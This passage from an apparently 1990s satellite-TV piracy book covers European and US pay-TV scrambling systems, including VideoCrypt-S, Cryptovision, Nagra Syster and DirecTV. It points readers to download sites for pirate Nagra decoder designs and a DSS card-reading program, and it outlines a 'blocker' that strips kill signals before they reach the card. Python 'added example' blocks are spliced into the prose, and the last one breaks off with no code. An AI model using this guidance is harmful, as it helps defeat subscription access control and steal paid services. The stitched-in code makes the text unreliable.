relies on transverting an off-air signal and sending it through the cable 
network. In some larger nets, the signal is demodulated first and then 
remodulated and upconverted for distribution. 


The weakness of a cut and rotate system is tilt. That is where the join points 
on the descrambled signal do not exactly match. This results in a lot of low 
frequency noise and glitching. The non-linearities on a cable system will 
accentuate this tilt problem. VideoCrypt has overcome this tilt problem and 
the satellite transmissions are relatively clean. On a cable system, the signal 
environment is controllable. The main amplifiers are temperature controlled 
as well as being gain controlled. The BBC Select service faced a different 
problem. The signal was to be distributed terrestrially via UHF transmitters. 


System Operation 


Line shuffle is where the order of a block of lines is changed. Line 1 might 
become line 10 in the scrambled order. The lines would then be restored to 
their proper order. This sounds simple but it is complex in reality. 


The VideoCrypt-S system is based on a block scramble. Each block is forty-seven 
seven lines with six blocks per field. The other lines in each field are 
reserved for teletext, VBI and access control data. 
There are three scrambling modes available: 
Full Shuffle - 282 lines 
Half Shuffle - every other field is shuffled 
Clear Video Delay 


The full shuffle and the half shuffle effectively destroy the picture. The block 
delay is not as secure as Discret has shown. When the modes are all used 
at the same time the effect on the picture is impressive. The clear block 
delay can outline the block and make analysis easier. 


Access Control: 


The access control system is based on the VideoCrypt system. Therefore it 
is smart card based. The scrambling is governed by a permutation 
generator. The seed for the generator is a 20 bit word derived from data 
transmitted over the air in an encrypted form. 
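The block shuffle and seeded permutation generator described above, worked through as an added example (not code from the book or from the system's designers). The block geometry (47 lines, six blocks, a 282-line field, a 20-bit seed) follows the text; the permutation generator itself (a 20-bit linear congruential step driving a Fisher-Yates shuffle) and the per-block seed mixing are assumptions, since the page does not describe them.

```python
"""Block line-shuffle model of the VideoCrypt-S scrambling described above.

Added example, not code from the book or from the system's designers.
Geometry follows the text: 47 lines per block, six blocks per 282-line
field, and a 20-bit seed that selects the permutation. The real
permutation generator is not on the page; a 20-bit linear congruential
step driving a Fisher-Yates shuffle stands in for it (an assumption).
"""

LINES_PER_BLOCK = 47
BLOCKS_PER_FIELD = 6
LINES_PER_FIELD = LINES_PER_BLOCK * BLOCKS_PER_FIELD  # 282: the full shuffle
SEED_MASK = (1 << 20) - 1                              # 20-bit seed word


def permutation_from_seed(seed, n=LINES_PER_BLOCK):
    """Derive a permutation of range(n) from a 20-bit seed.

    Hypothetical generator: each LCG step supplies the swap index for one
    Fisher-Yates round, so the seed alone fixes the line order of a block.
    """
    if not 0 <= seed <= SEED_MASK:
        raise ValueError("seed must be a 20-bit word")
    state = seed
    perm = list(range(n))
    for i in range(n - 1, 0, -1):
        state = (state * 1103515245 + 12345) & SEED_MASK
        j = state % (i + 1)
        perm[i], perm[j] = perm[j], perm[i]
    return perm


def invert(perm):
    """Inverse permutation: what the decoder needs to put lines back."""
    inv = [0] * len(perm)
    for i, p in enumerate(perm):
        inv[p] = i
    return inv


def block_seed(field_seed, block):
    """Assumption: mix the block index into the field seed so that the six
    blocks of a field are shuffled with different permutations."""
    return (field_seed ^ (block * 0x2B5F1)) & SEED_MASK


def scramble_field(field, seed, half_shuffle=False, field_index=0):
    """Shuffle the line order of one 282-line field, block by block.

    half_shuffle=True models the Half Shuffle mode: every other field
    (odd field_index here) is passed through in the clear.
    """
    if len(field) != LINES_PER_FIELD:
        raise ValueError("a field carries %d shuffled lines" % LINES_PER_FIELD)
    if half_shuffle and field_index % 2:
        return list(field)
    out = []
    for b in range(BLOCKS_PER_FIELD):
        block = field[b * LINES_PER_BLOCK:(b + 1) * LINES_PER_BLOCK]
        perm = permutation_from_seed(block_seed(seed, b))
        out.extend(block[perm[i]] for i in range(LINES_PER_BLOCK))
    return out


def descramble_field(scrambled, seed, half_shuffle=False, field_index=0):
    """Undo scramble_field; only the seed used by the encoder restores order."""
    if len(scrambled) != LINES_PER_FIELD:
        raise ValueError("a field carries %d shuffled lines" % LINES_PER_FIELD)
    if half_shuffle and field_index % 2:
        return list(scrambled)
    out = []
    for b in range(BLOCKS_PER_FIELD):
        block = scrambled[b * LINES_PER_BLOCK:(b + 1) * LINES_PER_BLOCK]
        inv = invert(permutation_from_seed(block_seed(seed, b)))
        out.extend(block[inv[i]] for i in range(LINES_PER_BLOCK))
    return out


def lines_displaced(field, scrambled):
    """Count lines that no longer sit at their clear position."""
    return sum(1 for a, b in zip(field, scrambled) if a != b)


if __name__ == "__main__":
    # Constructed sample field: line i is just the label "L<i>".
    clear = ["L%d" % i for i in range(LINES_PER_FIELD)]
    seed = 0x5A3C1                                 # constructed 20-bit seed
    tx = scramble_field(clear, seed)
    print("lines displaced:", lines_displaced(clear, tx))
    print("correct seed restores field:", descramble_field(tx, seed) == clear)
    print("wrong seed restores field:", descramble_field(tx, seed ^ 1) == clear)
```

The whole security of the line order rests on the decoder recovering the same 20-bit seed as the encoder, which is why the text places the seed inside encrypted over-the-air data that only the smart card can decrypt.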


The smart card holds the entitlement data, the user profile and the 
decryption algorithm necessary to decrypt the over the air data. In this 
respect it is the same as the ordinary VideoCrypt smart card. 


Decoder Circuitry: 


The main difference between VideoCrypt-S and VideoCrypt is the type of 
scrambling technique. VideoCrypt-S uses line shuffle and therefore requires 
a greater RAM storage. The shuffle is controlled by an ASIC. This ASIC was 
developed by Thomson. 


According to an official paper on the system, the ASIC is the heart of the 
system. The ASIC handles the data extraction, the memory allocation and 
the permutation generation. The data is extracted from the VBI lines and 
processed. Then it is fed to the decoder microcontroller bus. 


The housekeeper microcontroller in the VideoCrypt-S decoder is an 8052. 
According to sources, the program is unprotected and not dissimilar to that 
in the 8052 in the ordinary VideoCrypt decoder. The video ADC and DAC 
stages are similar to those of the ordinary VideoCrypt decoder. 


Will VideoCrypt Hacks Work? 


With the system falling into disuse, most of the following is now of historical 
interest. 
[Figure: VideoCrypt-S Architecture] 

Some of the hacks that worked on VideoCrypt will work on VideoCrypt-S. 
The EPROM card write voltage hack will work but only if that type of card is 
employed. This is unlikely as Sky were so badly burned on this one that they 
had to bring out a new card issue to stop the hack. 


Since most of the program in the 8052 housekeeper microcontroller is the 
same as that in the ordinary VideoCrypt, it is probable that this hack will 
work. 


The smart cards used by the services could probably have been hacked if 
there was a demand. Of course here lies the most important aspect. There 
is no point in commercially hacking a system only to find there is no demand 
for the hack. 


References: 
Hack Watch News - Various Issues 


IBC Technical Papers 1992: BBC Select: A Terrestrial Subscription 
Television Service. The BBC Select Decoder 


Cryptovision 


While the Cryptovision system has not been used widely on satellite, it is 
one of the more widely used digital scrambling systems in use on cablenets 
throughout Europe. It is mainly used in Scandinavia and Ireland. 


Developed in the late eighties as a more secure scrambling system, it took 
advantage of the digital video techniques that were becoming affordable at 
that time. 


Unlike many of the systems of that era, it has not been widely pirated. This 
is due mainly to the relatively secure design of its access control system 
and the fact that it is not in use on premium satellite television programming. 
However given that it is using an embedded secure microcontroller 
approach, it is not likely that the system would withstand a concerted attack. 


The system was originally manufactured by Tandberg. Tandberg have been 
associated with pay television systems for a long time and they were among 
the first to launch MAC encoders and decoders. The newer decoder models 
are manufactured by PACE. 


It is currently in use on the British Services Channel (SSVC) that 
broadcasts via the Intelsat at 27.5 Degrees West. At first glance many 
expected the channel to be using the VideoCrypt system. This mistake 
arose from the fact that the system uses the same basic technique as the 
VideoCrypt system though the access control is totally different. 

[Figure: Cryptovision Decoder Architecture] 


In Ireland, the system is the scrambling system in use on the Cablelink 
cable and MMDS nets. This would mean that it has the potential to be used 
by at least 400,000 users. However the take up of the premium rate 
programming on Cablelink has been relatively poor. The channel that the 
users find most attractive is Sky Sports. It is generally a more logical thing 
for users to get their premium programming via satellite and the terrestrial 
channels via cable. 


Cablelink does not scramble all of the channels on their networks, preferring 
instead to only scramble the premium movie and sports channels. The 
premium channels are already available via satellite anyway. However this 
may change in the next few years as some clueless money grubbing 
financial consultant may convince them to scramble all channels. Of course 
if they do this then that would mean that every home on a Cablelink net 
would have a decoder and each decoder would be a potential pirate 
decoder. 


Video Scrambling 


The technique used in the Cryptovision system is "Cut And Rotate". The line 
video is sectioned and cut, then rotated about the cut point. The sample rate 
is higher than the VideoCrypt system and as a result the quality of the 
descrambled picture is somewhat better. 


The cutpoint in each line is masked effectively so that there is no transient 
at the point. One of the first attempts at hacking the VideoCrypt system 
used an inductor to accentuate the cutpoint. With masking this cutpoint 
disappears. Apparently the masking process involves a form of oversampling 
where the sample windows are longer than is required. 


The original specification used Digit 2000 series ADCs and DACs. It is now 
believed that they would use the TDA8702 and the TDA8703 ICs. The 
sampling frequency is 17.73 MHz or four times the PAL colour subcarrier 
frequency. This gives an improved picture quality. 


Like the VideoCrypt system, there are 256 cutpoints each line. This is from 
a total of 921 samples. Some of the samples are not used. This makes it 
harder to detect the cutpoints in the scrambled video. 
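The cut-and-rotate line described above, with the tilt problem raised in the VideoCrypt-S section, worked through as an added example (not code from the book or from Tandberg/PACE). The 921 samples per line and 256 cutpoints come from the text; the mapping of cutpoint index to sample position, with unused guard samples at each end of the line, is an assumption, as is the simple linear model of tilt.

```python
"""Cut-and-rotate line model for the Cryptovision scrambling described above.

Added example, not code from the book or from Tandberg/PACE. Geometry from
the text: 921 samples per line (four times the PAL colour subcarrier) and
256 possible cutpoints per line. Assumption: the cutpoint index is mapped
onto the line with unused guard samples at each end, since the page says
only that some samples are unused; the real mapping table is not given.
"""

SAMPLES_PER_LINE = 921
CUTPOINTS = 256
GUARD = 20                                  # assumed unused samples per end
USABLE = SAMPLES_PER_LINE - 2 * GUARD       # 881 samples can carry a cut


def cutpoint_to_sample(cp):
    """Map an 8-bit cutpoint index to the sample at which the line is cut."""
    if not 0 <= cp < CUTPOINTS:
        raise ValueError("cutpoint index must be 0..255")
    return GUARD + (cp * USABLE) // CUTPOINTS


def scramble_line(samples, cp):
    """Cut at the cutpoint and rotate: the tail of the line is sent first."""
    if len(samples) != SAMPLES_PER_LINE:
        raise ValueError("expected %d samples" % SAMPLES_PER_LINE)
    k = cutpoint_to_sample(cp)
    return samples[k:] + samples[:k]


def descramble_line(scrambled, cp):
    """Rotate back; exact only when the decoder knows the cutpoint."""
    if len(scrambled) != SAMPLES_PER_LINE:
        raise ValueError("expected %d samples" % SAMPLES_PER_LINE)
    k = cutpoint_to_sample(cp)
    tail = SAMPLES_PER_LINE - k             # length of the segment sent first
    return scrambled[tail:] + scrambled[:tail]


def add_tilt(samples, tilt):
    """Model a distribution path with tilt: the level drifts linearly
    along the transmitted line (assumed linear for illustration)."""
    return [v + tilt * i for i, v in enumerate(samples)]


def join_step(descrambled, cp):
    """Amplitude jump at the rejoin point of a descrambled line.

    For a line that was flat before scrambling this is zero on a clean
    path. Tilt picked up in transit lands on the two halves unequally, so
    after rotation it shows up as a step of tilt * (SAMPLES_PER_LINE - 1)
    at the join: the low-frequency glitch the text warns cable engineers about.
    """
    k = cutpoint_to_sample(cp)
    return descrambled[k] - descrambled[k - 1]


if __name__ == "__main__":
    flat = [100.0] * SAMPLES_PER_LINE          # constructed flat grey line
    cp = 37                                     # constructed cutpoint index
    tx = scramble_line(flat, cp)
    print("clean path, join step:", join_step(descramble_line(tx, cp), cp))
    tilted = add_tilt(tx, 0.01)
    print("tilted path, join step:", join_step(descramble_line(tilted, cp), cp))
```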
The Access Control System 


The access control system is designed to be flexible in that it can support a 
number of methods ranging from over the air addressing to smart cards. 


The system, as used in Ireland and Scandinavia, uses the over the air 
control with the embedded secure microcontroller. However there are some 
questions as to whether the secure microcontroller is indeed secure. 


Apparently the system microcontroller is an 8051 type. This means that the 
hacks covered elsewhere in the book may allow this chip to be popped. 
Indeed there are rumours that this is exactly what happened with a hack on 
this system in Ireland. However the information on the hack suggests that it 
was possible to turn on channels. At the moment, there is not a sufficient 
number of decoders to justify the risks of modifying them. Cable and MMDS 
piracy in Ireland is a serious offence and anyone modifying cable or MMDS 
decoders in this manner would be running the risk of a £20000 fine. 


Some of the decoders have an EEPROM. At this time it is not known if this 
EEPROM holds any access control data such as the tiering or subscriber 
number. If indeed it does hold such data, then the possibility of a hack on 
this aspect may exist. This would be a particularly devastating hack as it 
might be applied to all official decoders. It may of course just hold data on 
the shifts for cutpoint masking. 


According to some reports the decoders in operation also use a 68301 as 
their main secure microcontroller though this has not been confirmed. If this 
is indeed the case, the decoder is using a typical twin microcontroller 
approach. However this chip may not be as secure as others, typically the 
68705 and the 68HC11 were regarded by some as being secure and were 
subsequently hacked. 


The rather confused situation on just what microcontrollers the decoder 
uses may be attributed to the fact that there are two designs on the market. 
The original design was manufactured in Ireland. A later design is currently 
being manufactured by PACE. 


The vertical blanking interval carries the necessary crypto data and 
validation levels in an encrypted format. The data is virtually the same as 
teletext though it does not use the teletext lines. The use of a teletext like 
data format enables the use of cheap teletext ICs. 


It is possible for the headend user to switch on decoders over the air. It is 
this facility that makes the piracy on the system so difficult. It appears that 
piracy on this system, while being difficult, is not impossible. However the 
fact that the main source for the decoders is the cable or MMDS company 
would imply that the purchaser or user of the decoder would be recorded. 


It is not definitely known what crypto system is used to encode the over the 
air data but it is possible that it is a DES variant. This would mean that an 
approach based on hacking the key by brute force would be tricky if not 
totally uneconomical. Even in the United States where the VideoCipher 
system uses the DES algorithm, the algorithm itself has not been reversed. 
There was a weak link in the access control section of that system that was 
exploited by hackers. Cryptovision have examined the hacks on VideoCipher 
and have no doubt hardened their system against a similar hack. 


However given the advances in hacking techniques and knowledge over the 
last few years, this system is clearly at risk. The embedded secure 
microcontroller principle has been completely discredited. A hack on this 
system would be very serious in that all of the decoders in the market would 
have to be upgraded. At the moment, with the sporadic use of the system 
on premium channels only, this would not be difficult. However if the hack 
reaches the market in a few years time when all channels are scrambled, 
then it will be a major problem for Cablelink. 


Should a widespread hack on this system occur, it will be a hack based on 
modifying the access control data. The video scrambling system is resilient 
enough to be secure for at least another year or so. 


The slow pace of advances in cable based systems will, inevitably, work 
against the security of this system. The reason for this is that while the 
technology used on the cable system remains comparatively static, the 
techniques of the hackers advance. In the end, Cablelink and other users of 
this system may well be left relying on the good nature of their subscribers 
and the strengths of the local cable piracy legislation. 


Audio Scrambling 


There is an audio scrambling facility on the Cryptovision decoders though it 
has not yet been used. There are apparently a number of options and the 
following have been mentioned: encrypted adaptive delta modulation, 
encrypted NICAM and spectrum inversion. 


Using audio scrambling would drive up the cost per unit of the decoders. 
Such a price increase would not be attractive to the small cable television 
companies interested in using the system. The result is that the standard 
implementation of the system is video scrambling only. 
Digicrypt 
The Digicrypt system started out as the Sat-Tel VideoCode system. DCE 
took over the business interests of Sat-Tel when Sat-Tel liquidated. 
VideoCode was one of the main developments. 


The system was a joint development between Zenith (USA) and Sat-Tel / 
DCE. Zenith provided the over the air access control system and software 
and the hardware was developed by Sat Tel. It had been demonstrated at 
the International Broadcasting Convention 1990 and at various Cable And 
Satellite Shows. There have been no reports of the system actually being 
deployed yet. 


Video Scrambling 


There are two techniques used in the Digicrypt; line delay and line shuffle. 
The line delay appeared on demonstration to be a single unit delay. The 
demonstration in question was at the IBC. This facility is not mentioned in 
the Digicrypt literature issued by DCE. There are two possibilities. Either the 
facility has been dropped or it is a reserve facility. Judging from the amount 
of critical information given in the literature it is a reserve facility. It would 
also follow that DCE appears to be new to the signal security business. The 
literature contains very little of the generalities used on other system 
brochures. 


The line shuffle used is either a 32 line shuffle or a 128 line shuffle. With this 
low line count, the shuffle type is probably the sliding bar type. 


The video decoder architecture would be similar to most other line shuffle 
based decoders. The main difference would be in the access control 
section. This could be an outboard provided by Zenith and would, if this was 
the case, be housed in a pluggable module similar to the BSB EuroCypher 
ACM. Alternatively, since Zenith were involved from such an early stage, the 
access control section could be part of the actual main PCB. 


Audio Scrambling 


The audio scrambling used is the same as that used by BBC on the Intelsat 
at 27.5 Degrees West when they were scrambling in SAVE. After all, 
Sat-Tel manufactured those descramblers and the audio scrambling was 
developed by Sat-Tel. 


Now for the critical data. The audio scrambling system, according to the 
data sheet is an upward spectrum shift. The range of the spectrum shift is 
from 170 Hz to 3.1 KHz. In other press releases included in the same folder, 
they state that the AudioCode system is capable of 12 different frequency 
shifts. 


Access Control 


The access control system used by Digicrypt is an over the air type. Four 
lines of the VBI are used to transmit the addressing data. The system can 
address up to 9000 decoders per minute. 


The number of decoders that can be addressed on one system is 16.7 
million. The tier structure is 256 levels wide. 


Hacks 


Since this system has not been deployed, this would be a hypothetical hack. 
The video scrambling is too secure to hack and obviously is not the weak 
point. The weak point would be found in the access control system to 
descrambler interface. 


Most of the circuitry would be ASICed to counter such a hack. There is the 
possibility that the Zenith system would be related to previous versions in 
the United States. Therefore a comparison of the systems would be in 
order. If there is a great enough use of the system then, the ASICed areas 
will be reverse engineered. 


The Nokia LS256 


The Nokia LS256 system is currently in use on satellite by the Italian 
hardcore porn channel Satisfaction Club TV. It is also used sporadically on 
cablenets throughout Europe. 


This system is another line shuffle system and it has remained secure due 
to lack of interest. It is believed that the system also uses a sliding bar 
shuffle. Much of the operation of this system would be similar to the 
DigiCrypt system described previously. This system is also based on the 
Embedded Secure Microcontroller principle. 


The fact that this system is not in widespread use has protected it against 
any real attack by hackers and pirates. Of course porn channels are always 
prime targets for hackers but at the moment there are just too many other 
channels that are more easily hacked to justify going after this system. 


This system has received good recommendations from MMDS networks 
using the system in Italy. 
Nagra Kudelski Syster 


The Syster system was developed to replace the totally hacked Discret 
system. Canal Plus run the biggest network of channels in Europe and in 
France alone have over three million subscribers. Even though piracy is 
very much illegal, it has not completely deterred people from using pirate 
descramblers. 


The actual scrambling system was created by Nagra Kudelski of Switzerland. 
The decoders are manufactured by Eurodec. Eurodec is jointly owned 
by Canal Plus and Sagem. 


Most hackers refer to the system as the Nagra Kudelski Syster system or 
Nagravision or just as Nagra. One of the reasons for this appears to be that 
the spelling of Syster looks like the spelling used for the name of a heavy 
metal band. Of course the actual name could have been a joke by the 
system developers. It is a real head banger to hack. 


The actual origin of the Syster seems to be from the French for SYSteme 
TERrestrial. As it is now used on satellite as well, it seems to be more often 
referred to as Nagra. This is a bit confusing, especially for hackers in the 
USA. Nagra supplied the encryption overlay for some of the newer digital 
services. 


To date the system has been used on Canal Plus, Premiere and Canal Plus 
España. Teleclub has also changed to the system. It has effectively 
become the de-facto German language scrambling system. The fact that 
Canal Plus in France are also using it makes it the most widely used system 
in Europe. According to sources, the system is being considered by the 
European Broadcasting Union for use on its newsfeed network but then the 
EBU have been considering using a scrambling system for the last few 
years and nothing has happened. 


Unlike other systems, there appears to be a dearth of IRDs. In fact 
according to a few sources there are no integrated receiver decoders for 
Syster. The actual distribution of the decoders also appears to be 
controlled. This is one of the strengths of the system. It allows the 
programme provider to maintain control over the system. When IRDs are 
allowed then the programme provider loses control and Grey Market Piracy 
becomes a serious problem. The best illustration of this fact lies in what 
happened with VideoCrypt and Sky. 
The Video Scrambling 


The video scrambling is the main strength of the Nagra system. It uses line 
shuffle scrambling. This makes the system effectively transparent in that it 
can be used on satellite and on cable. 


The line shuffle technique has two forms. The fixed form is where the field is 
broken up into a number of bars having the same number of lines. The 
shuffle action takes place within the confines of the bar. 


The second form, the sliding bar, is the more secure form. Instead of the 
bars appearing at fixed positions in each field, their positions change 
from field to field. This reduces the chances of success for a correlation 
hack that samples and compares fields. 


The video descrambling process is, like most line shuffle systems, ASIC 
based. It is perhaps one of the more complex ASICs used in a decoder of 
that era. To date it has not been reverse-engineered. 


The video descrambling is based on a TDA8708 Video Analog to Digital 
Converter and a TDA8702 Digital to Analogue Converter. The actual 
descrambling process is handled by the custom microcontroller/ASIC. 


The off-air video is filtered and clamped before being fed to the ADC. The 
digital scrambled video is then fed to the ASIC which stores it in RAM. The 
ASIC then clocks the video out of the RAM in the correct order to the DAC 
strip where it is converted back to analogue and filtered before being routed 
to the decoder's SCART. 


The above explanation is a simplified one. The operation of the official 
decoder is complex as the design is a multi-microcontroller one. 


The Access Control System 


The access control system on Syster is a dual system. It uses over the air 
addressing in addition to a smart card or rather smart key. The carrier of the 
detachable secure microcontroller is key shaped. It is referred to as the 
“Key” on the advertising brochures. 


The Key is reprogrammable over the air and is initialised when the 
subscriber is authorised. Apparently all Syster decoders have to be 
authorised over the air. The subscriber has to request the authorisation 
centre to authorise the decoder. 


The over the air addressing is carried in the VBI. It has a fast data clock and 
is believed to be in the region of 4 MHz. This would give the system a fast 
subscriber update speed. 
The fact that the Key has to be authorised in the decoder would seem to 
indicate that the decoder would have the subscriber's identity code 
implanted. This would allow for Key matching and any authorised decoder 
being shipped outside the copyright area could be traced, if found, to a 
subscription. 


The microcontroller used in the Nagra key is an ST16F44 series smart card 
microcontroller. The microcontroller is a relatively old one and liable to 
reverse-engineering. There have been rumours of pirate smart cards for the 
system. However most of these rumours turned out to be ill-founded. The 
problem for hackers and pirates over the last few years has been that the 
number of decoders in free circulation has not been enough to warrant the 
hack. 


The possibility of hacking the Nagra system in the primary markets has 
been considered too risky by many of the major pirates, especially when 
they are in those primary markets. They had to consider the hacking of the 
Nagra system in light of the money that they were making from the piracy of 
the D2-MAC EuroCrypt channels and the Sky VideoCrypt channels. 
However this has not deterred the pirates in jurisdictions outside of those 
primary markets selling into them. The pirate Nagra SECAM decoder is 
selling well at the moment although it is not known how many of the 
decoders are ending up in the primary market of France. 


The one thing that Nagra has proved is that the controlled access to 
decoders is essential to maintaining a secure system. This is of course an 
alien concept to the marketing executive who would rather see the decoders 
on open sale. For the best examples of what happens when the decoders 
are on open sale you have only got to look at the piracy problems of the 
D2-MAC EuroCrypt channels and the VideoCrypt channels. But even all that 
did not stop the Nagra system from being hacked. The hack is a direct 
assault on the video scrambling technique. Of course it was not feasible 
economically or technologically until recently. 


• Where To Obtain Files To Build A Pirate Nagra SECAM Decoder 


The pirate Nagra SECAM decoder designs and programs have been posted 
on most BBSes dealing with satellite television. The full PCB patterns, 
component listings and ROM and MACH130 JEDEC listings were posted 
on the www.paranoia.com/~defiant website. These files are also accessible 
on its two mirror sites, one of which is www.eurosat.com. 
The DirecTv (VideoGuard) System 


The news that the DirecTv system was hacked shocked nobody except the 
fools who had convinced themselves that it was secure. Not even News 
Datacom were convinced that it would withstand a concerted attack. This 
was a hard won bit of experience. Of course News Datacom emphasised 
that the security element, the smart card, could be replaced in the event of a 
hack. They also mentioned the individual cost of the cards ranging from $5 
to $20. Of course when you extrapolate this cost to the cost of a complete 
new card issue it works out to between $5 Million and $30 Million not to 
mention the logistical cost of implementing a new issue. So much for the 
cheap replaceable security element! 


It was almost as if the DirecTv system was doomed from the start. The 
more experienced amongst us knew it the minute that we found out that 
News Datacom were supplying the security overlay for the system. Perhaps 
it does sound like a cynical reaction but you have to remember that the 
VideoCrypt system had been hacked to pieces here in Europe and there 
was little if anything that News Datacom were able to do to prevent it. The 
DirecTv system is also referred to as the VideoGuard system. The name is 
a somewhat welcome departure from the endless flood of “crypt” names. 
However just changing the name did not mean that the system was going to 
remain secure. 


You have got to wonder at the kind of mind that would put a patent number 
on a smart card. It is just like telling a burglar what kind of lock your door 
uses. And yet this is exactly what has happened with the DSS card. The text 
that appears on the card is as follows: 


“This card is the property of News Datacom Ltd. and must be returned 
upon request. Incorporates VideoGuard ™ security system. Provided for 
reception of authorized 101 W longitude satellite services. Protected by 
U.S. Patent 4,748,668, and others.” 


That patent referred to on the smart card is the Fiat-Shamir Zero Knowledge 
Test. It is an authentication algorithm that the decoder runs to see that the 
smart card inserted is a genuine smart card. The same authentication 
algorithm was used in the analog VideoCrypt system in Europe - and 
defeated. It was not exactly the best start for a new system. 


The authentication algorithm was compromised by the fact that the data that 
was intended to remain secure did not. Therefore a hacker with an 
understanding of how the algorithm worked could easily fake the correct 
responses. This trick had been learned by hackers in Europe with the 
VideoCrypt-II system where the ZKT had more significance than in 
VideoCrypt-I. In the VideoCrypt-I system, the ZKT had only been used for 
authentication. In the VideoCrypt-II system, the results of the ZKT had been 
EXORed with the results of the hashing algorithm to give the correct seed 
result. 


Of course things then proceeded from downhill to subterranean. The 
rumours of the hack on the DSS card started as soon as the 09 card was 
hacked in Europe. The smart card that News Datacom had used for the 09 
in Europe was the same as that used for the first issue DSS card and the 
VideoCrypt-II card. 


The roots of the hack on the DirecTv system lie in the ruins of the Sky 07 
and 09 cards. Out of the knowledge gained in these hacks came the bones 
for the DirecTv hack. 


In Europe, the VideoCrypt system, using the issue 07 card, was hacked. 
The full source code of the hack had been distributed freely on the Internet 
and via BBSes. The Digital Satellite System was preparing for launch in the 
USA. It was a gut-wrenching time for the executives in DSS. The common 
element between Europe and the US was News Datacom. The DSS 
executives were worried about the security of their new system. They, and 
no doubt the hackers and pirates, were wondering if what happened in 
Europe would happen in the US. 


Slowly but surely the press barrage started. The satellite television trade 
press began to run articles about the new DSS system. They were, in 
hacker terms, content free text. The majority of these articles were written 
by clueless people without any knowledge of what really happened in 
Europe. One article in particular stated that VideoCrypt had been unhacked 
since its introduction in Europe in 1989. Yeah right! And the 500,000 Pirate 
VideoCrypt smart cards and the Omigod emulator programs did not exist. It 
was a replay of what had happened in Europe - the puff pieces in the trade 
press and the inevitable hacks. 


Some of the quotes were stupid in the extreme. One memorable one 
seemed to put forth the argument that if people did not know about the 
piracy on the system then it was not much of a problem. It was considered 
by some that Darwin may have been wrong as DirecTv executives seemed 
to have evolved from ostriches. 


Well the 500,000 pirate VideoCrypt cards were very real and they forced 
Sky to issue their new card ten months ahead of schedule. There was an 
even greater problem. The 08 card they had planned to launch was almost 
identical to the hacked 07 card. Instead they had to go for the 09 card. 
The 09 Sky card was different from the 07 in two major ways. It had a 
different architecture and it had a very different algorithm. Sky started to 
distribute this new card in February 1994 but they did not switch over to the 
card until 18th May 1994. That day is known as Dark Wednesday by 
European hackers. 


The connection here is the timing. It would have been very convenient for 
News Datacom to draw heavily on the Sky 09 card for the new DSS card. 
Most of the ROM routines could have been easily adapted for the new 
system. The main changes would of course have been in the EEPROM. 
The EEPROM of the smart card is the area that contains the main 
cryptographic routines. 


The operation to pop the 09 Sky card in Europe took a few months. It 
involved completely reverse engineering the smart card. Some preliminary 
code was sold in June 1994 at an auction in London. It was a start but it took 
a further four months before the system was totally compromised. Perhaps 
the most important part of the operation was the discovery of a back door in 
the smart card's code. 


The current theory on the DirecTv card is that it draws heavily on the 07 Sky 
card and on the VideoCrypt-II card. It would not be unthinkable that the 
algorithm in the card uses the same tricks as proved successful in the 
VideoCrypt-II card, primarily the integration of the ZKT authentication with 
the seed generation. The data rate of the DirecTv card also indicates 
that the faster data rate (38K4) of the VideoCrypt-II card has been 
employed. 


The DIREC Program 


Acknowledgement: Thanks To Peter Pan For Routines And Comments 


The program given here for examining the card has been tested with DSS 
cards and works well. No doubt other programs will become available 
within the next few months. 


The DIREC program works with the Phoenix interfaces given in Chapter 4. 
There are commercial versions of these interfaces available and Chapter 4 
also details one of the more versatile models. In the US, an interface is 
available from Scrambling News. 


The DIREC program is based on the DECOEM.C program developed by 
Markus Kuhn to emulate the action of the VideoCrypt decoder/IRD. The 
version here allows the PC to emulate a DSS IRD and talk to a legitimate 
DSS card or indeed a pirate DSS card. 
The DSS card is initialised at a baudrate of 9600 Baud. After initialising, it 
switches up to the faster rate of 38400 Baud for the data transfer. This 
means that it can send and receive data at a faster rate than the 07 or 09 
Sky card. In this respect it mirrors the development of the VideoCrypt-II card 
here in Europe. 


As it stands, the program will read three packets from the card; the ATR, the 
58h packet and the 2Ah packet. These are some of the most important 
packets in the system as they identify the card, the IRD and the channel 
subscription details. 


The program was written in C and has been successfully compiled with 
Borland C. The procedure is to create a project file called DIREC.PRJ, add 
the DIREC.C and then add ASYNC.OBJ. It is then a simple matter to 
compile the program. The file, including the object file and the compiled 
version are available from: 


http://www.iol.ie/~kooltek/directv 
http://www.hackwatch.com/~kooltek/directv 


Naturally the files will also be available via the BBSes and all good WWW 
and FTP sites. 


Using the framework of this program it is possible to create a program that 
can be used to test cards with various packets. Of course to create a 
Phoenix type program, a working hash function would be required. However 
since the card addressing system seems to be almost entirely in the clear, it 
may well be possible to create a Blocker type program that will examine 
each of the 42 packets for the relevant addressing data for the card. 


This would be a rather simplistic hack, though given that the card is 
roughly of the same era as the 07 Sky card, such a hack may well be 
possible. 


The 07 Sky card did not encrypt the over the air authorisation and 
deauthorisation data, namely the instructions and the card numbers. This 
was a feature of the 09 card and also the VideoCrypt-II card. If the 42h 
packet is indeed the workhorse packet, then if this packet can be examined 
for the relevant turn-on or kill signals and the card identification data, then a 
blocker is possible. The blocker device, based on the Genesis/Blockers 
used on VideoCrypt would read the card identification data from the 58h and 
2Ah packets and compare the 42h packet data to the identification data. 
Then if the card data is contained in the 42h packet, the packet is dropped 
before it reaches the card. 
This is a rather simplistic hack. It may not work as News Datacom may have 
chained the 42h packets. Chaining means that both the relevant 42h packet 
and the relevant seed generation data packet (probably the 40h packet) are 
required for the seed generation. However in the past News Datacom have 
made serious mistakes and given the age of the card, (circa Sky issue 07), 
these mistakes have propagated. 


• ATR 


The Answer To Reset tells the IRD interface how to handle the smart card, 
i.e. what clock frequency to use and what programming voltages and 
currents are required (covered in detail in Chapter 4). An important aspect 
of the ATR also shows up in the 2Ah packet. The bytes 21 b0 11 show up 
there to identify the card. 


Answer To Reset: 3f 76 13 25 04 21 b0 11 4a 50 03 
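As an added example (not code from the book or from the DIREC program), the following Python parses that ATR the way the DIREC reset() routine does, following ISO 7816-3: TS, T0, the TA/TB/TC/TD interface bytes, the historical bytes and an optional TCK. It assumes a 3.5712 MHz card clock (DIREC's CLK constant is 3.571e6); on this ATR it shows 21 b0 11 as the first historical bytes, TB1 = 25h as 5 V / 50 mA programming, and TA1 = 13h as Fi = 372, Di = 4, which at that clock is exactly the 9600 to 38400 baud switch the card makes after initialisation.

```python
# Added example (not part of the book or the DIREC/DecoEm program): an
# ISO 7816-3 Answer To Reset parser run over the DSS card ATR quoted above.
# Assumption: a 3.5712 MHz card clock; DIREC's CLK constant is 3.571e6.

# Fi (clock rate conversion) and Di (bit rate adjustment) tables, ISO 7816-3.
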